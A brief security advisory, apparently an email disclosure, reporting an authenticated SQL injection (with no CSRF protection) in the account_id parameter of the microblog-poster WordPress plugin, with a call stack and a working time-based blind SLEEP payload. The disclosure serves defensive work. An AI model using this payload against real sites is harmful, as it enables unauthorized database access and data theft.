Hello,
Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection (microblogposter_settings_output())
Method: POST
Vulnerable parameter: account_id
Example PHP callstack:
microblogposter_settings_output [/microblog-poster/microblogposter_options.php:543]
wpdb::get_results
Verification:
...
Parameter: account_id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: update_account_hidden=1&account_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hUuS)
...
--
Regards,
Marcin Probola,